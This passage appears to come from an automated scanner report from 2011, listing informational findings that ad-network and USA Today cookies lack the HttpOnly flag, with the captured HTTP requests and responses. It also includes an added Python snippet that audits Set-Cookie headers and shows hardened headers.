Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1304949602; i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 15:37:12 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
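The finding repeated through this section (a Set-Cookie header without the HttpOnly flag) is easy to check mechanically, and the check is worth seeing once rather than reading the same boilerplate fourteen times. The following Python is an added example, not part of this report and not Burp's or any listed vendor's code. It pulls every Set-Cookie header out of a raw HTTP response, records which of HttpOnly and Secure are absent, applies a name-based guess at whether the cookie looks like a session token (my own assumption; the scanner's actual rule is not given on this page), and shows what the hardened header would look like. The sample response is a constructed, shortened copy of the r.openx.net exchange above, with the usatprod cookie from the sitelife.usatoday.com responses later in this section and a made-up SESSID cookie added for contrast.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: the r.openx.net response above with the body dropped,
# plus the usatprod cookie from the sitelife.usatoday.com responses and a
# made-up SESSID cookie that already carries HttpOnly (assumption, for contrast).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 09 May 2011 15:37:12 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; "
    "expires=Wed, 08-May-2013 15:37:12 GMT; path=/; domain=.openx.net\r\n"
    "Set-Cookie: usatprod=R1449692072; path=/\r\n"
    "Set-Cookie: SESSID=d138b6ea0107f86bc8ce8957059b7431; path=/; HttpOnly\r\n"
    "Content-Type: image/gif\r\n"
    "\r\n"
)

# Name-based heuristic for "looks like a session token". Assumption: the
# value alone is a poor signal (the opaque UUID in i= above is a tracking id).
SESSION_NAME = re.compile(r"sess|sid|token|auth|login", re.I)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: Dict[str, str] = field(default_factory=dict)  # lower-cased attr -> value ('' for flags)

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs


def parse_set_cookie(header_value: str) -> Cookie:
    """Split one Set-Cookie value into name, value and an attribute map."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return Cookie(name.strip(), value.strip(), attrs)


def set_cookie_headers(raw_response: str) -> List[str]:
    """Return each Set-Cookie header value from a raw HTTP response.

    Each header line is kept separate: Set-Cookie cannot be folded on commas
    because the Expires attribute itself contains one (see the dates above).
    """
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        key, _, val = line.partition(":")
        if key.strip().lower() == "set-cookie":
            values.append(val.strip())
    return values


def audit(raw_response: str) -> List[dict]:
    """Per cookie: which of HttpOnly/Secure are absent, and whether the name
    suggests a session token (the distinction the report's wording draws)."""
    findings = []
    for header_value in set_cookie_headers(raw_response):
        cookie = parse_set_cookie(header_value)
        missing = [flag for flag, present in (("HttpOnly", cookie.httponly),
                                              ("Secure", cookie.secure)) if not present]
        findings.append({
            "name": cookie.name,
            "missing": missing,
            "session_like": bool(SESSION_NAME.search(cookie.name)),
        })
    return findings


def harden(header_value: str, add_secure: bool = True) -> str:
    """Return the Set-Cookie value with HttpOnly (and optionally Secure)
    appended if absent. Secure is only correct for cookies served over HTTPS;
    every host in this report was scanned over plain http, so pass
    add_secure=False for those."""
    cookie = parse_set_cookie(header_value)
    hardened = header_value.strip().rstrip(";")
    if not cookie.httponly:
        hardened += "; HttpOnly"
    if add_secure and not cookie.secure:
        hardened += "; Secure"
    return hardened


if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print(finding)
    print(harden("usatprod=R1449692072; path=/", add_secure=False))
```

Two caveats a reader of this section should keep in mind: HttpOnly only stops script in the page from reading the cookie, so it is a mitigation for cookie theft via XSS, not for CSRF or for interception on the wire; and adding Secure to a cookie on a host that is only ever reached over http, as all of these were, silently stops the cookie from being sent at all.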

11.49. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: C2, F1, BASE, ROLL and 46632794 (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=foAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NX8bLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
Set-Cookie: C2=...[SNIP]...; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981
...[SNIP]...

11.50. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: segments_p1 (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjjl0gZcefgJT9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBATRyJ9C+u7eOgO17sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpv+gwTudYL07/cDMi/uBQms3Q8y5eU+JgCPhUHM"; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; 
io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:31:19 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 15:31:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1114604&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6544434

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: BR_MBBV and DRN1 (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6544434 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:38:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Mon, 07-May-2012 15:38:26 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcg; expires=Wed, 08-May-2013 15:38:26 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/no-user-image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/no-user-image.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078
If-None-Match: "239c7984ce7dca1:2af"
If-Modified-Since: Tue, 15 Dec 2009 21:35:27 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:08 GMT
Etag: "239c7984ce7dca1:2af"
Connection: close


11.53. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1381
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 10:44:41 GMT
Accept-Ranges: bytes
ETag: "703011f77f6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

11.54. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "f668327072f6ca1:2af"
If-Modified-Since: Tue, 18 May 2010 10:11:10 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Tue, 18 May 2010 10:11:10 GMT
Accept-Ranges: bytes
ETag: "f668327072f6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.55. http://sitelife.usatoday.com/ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1638
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 09:52:46 GMT
Accept-Ranges: bytes
ETag: "a08de6ff6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

11.56. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "5385c912cc9ccb1:2af"
If-Modified-Since: Thu, 16 Dec 2010 02:51:01 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Thu, 16 Dec 2010 02:51:01 GMT
Accept-Ranges: bytes
ETag: "5385c912cc9ccb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.57. http://sitelife.usatoday.com/ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

